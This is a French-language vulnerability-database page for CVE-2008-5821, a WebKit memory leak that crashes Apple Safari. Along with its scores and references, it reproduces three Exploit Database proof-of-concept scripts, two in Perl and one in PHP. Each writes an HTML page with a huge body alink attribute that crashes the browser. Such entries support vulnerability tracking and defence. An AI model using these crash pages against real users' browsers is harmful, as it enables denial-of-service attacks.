CVE-2008-5821 : Détail

CVE-2008-5821

11.86%V4
Network
2009-01-02
18h00 +00:00
2017-08-07
10h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

Memory leak in WebKit.dll in WebKit, as used by Apple Safari 3.2 on Windows Vista SP1, allows remote attackers to cause a denial of service (memory consumption and browser crash) via a long ALINK attribute in a BODY element in an HTML document.

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-399 Category : Resource Management Errors
Weaknesses in this category are related to improper management of system resources.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 5 AV:N/AC:L/Au:N/C:N/I:N/A:P nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 32694

Date de publication : 2008-12-31 23h00 +00:00
Auteur : Jeremy Brown
EDB Vérifié : Yes

source: https://www.securityfocus.com/bid/33080/info Apple Safari is prone to a denial-of-service vulnerability that resides in the WebKit library. Remote attackers can exploit this issue to crash the affected browser, denial-of-service condition. Apple Safari 3.2 running on Microsoft Windows Vista is vulnerable; other versions running on different platforms may also be affected. Note (December 20, 2010): Safari on iOS 4.0.1 is also vulnerable. #!/usr/bin/perl # safari_webkit_ml.pl # Safari (Webkit) 3.2 Remote Memory Leak Exploit # Jeremy Brown [0xjbrown41@gmail.com/jbrownsec.blogspot.com] # Access violation when writing to [00000018] # EIP 6B00A02B WebKit.6B00A02B # LastError 00000008 ERROR_NOT_ENOUGH_MEMORY # Memory leaks are common in browsers.. tested on Vista SP1 # Compliments of bf2 $filename = $ARGV[0]; if(!defined($filename)) { print "Usage: $0 <filename.html>\n"; } $head = "<html>" . "\n"; $trig = "<body alink=\"" . "A/" x 10000000 . "\">" . "\n"; $foot = "</html>"; $data = $head . $trig . $foot; open(FILE, '>' . $filename); print FILE $data; close(FILE); exit;
Exploit Database EDB-ID : 32695

Date de publication : 2008-12-31 23h00 +00:00
Auteur : Pr0T3cT10n
EDB Vérifié : Yes

source: https://www.securityfocus.com/bid/33080/info Apple Safari is prone to a denial-of-service vulnerability that resides in the WebKit library. Remote attackers can exploit this issue to crash the affected browser, denial-of-service condition. Apple Safari 3.2 running on Microsoft Windows Vista is vulnerable; other versions running on different platforms may also be affected. Note (December 20, 2010): Safari on iOS 4.0.1 is also vulnerable. <?php # _ ____ __ __ ___ # (_)____ _ __/ __ \/ /_____ ____/ / _/_/ | # / // __ \ | / / / / / //_/ _ \/ __ / / / / / # / // / / / |/ / /_/ / ,< / __/ /_/ / / / / / # /_//_/ /_/|___/\____/_/|_|\___/\__,_/ / /_/_/ # Live by the byte |_/_/ # # Members: # # Pr0T3cT10n # -=M.o.B.=- # TheLeader # Sro # Debug # # Contact: inv0ked.israel@gmail.com # # ----------------------------------- # The following code is a proof of concept for a crash vulnerability that exists in 'Apple iPhone MobileSafari'. # Point your browser to the created(crash.html) file and see what happen ;) # The vulnerable tag is: # * <body alink="A x 12000085"> # ----------------------------------- # Exploit Title: Apple iPhone Safari (body alink) Remote Crash # Date: 19/12/2010 # Author: Pr0T3cT10n # Affected Version: IOS 4.0.1 # Tested on Apple iPhone 3, IOS 4.0.1 MobileSafari # Launch Safari, point your browser to the page and safari will crash. # ISRAEL, NULLBYTE.ORG.IL $string = str_repeat('A', 12000085); $code = "<html> <head> <title>Apple iPhone Safari (body alink) Remote Crash</title> </head> <body alink='{$string}'> </body> </html>"; if(file_put_contents("./crash.html", $code)) { echo("Point your safari mobile browser to `crash.html`.\r\n"); } else { echo("Cannot create file.\r\n"); } ?>
Exploit Database EDB-ID : 12408

Date de publication : 2010-04-25 22h00 +00:00
Auteur : Xss mAn
EDB Vérifié : Yes

#!/usr/bin/perl # Safari 4.0.5 (531.22.7) Denial of Service # Exploit Title: [Safari 4.0.5 (531.22.7) Denial of Service] # Date: [2010-04-26] # Author: [Xss mAn] # Software Link: [http://www.apple.com/safari/download/] # Version: [Safari 4.0.5 (531.22.7)] # Tested on: [windows 7] #Gr33t [2] : T-T34M $headr1="<HTML>\n<style type=\"text\/css\"\>\n"; $headr2="\nbody {alink: "."A/" x 13333337 ."}\n"; $headr3="</style>\n</HTML>"; open(file ,'>>Crash.html'); print file $headr1.$headr2.$headr3; close(file); #perl 4 M3N ;)

Products Mentioned

Configuraton 0

Apple>>Safari >> Version 3.2

    Microsoft>>Windows_vista >> Version *

    Références

    http://www.securityfocus.com/bid/33080
    Tags : vdb-entry, x_refsource_BID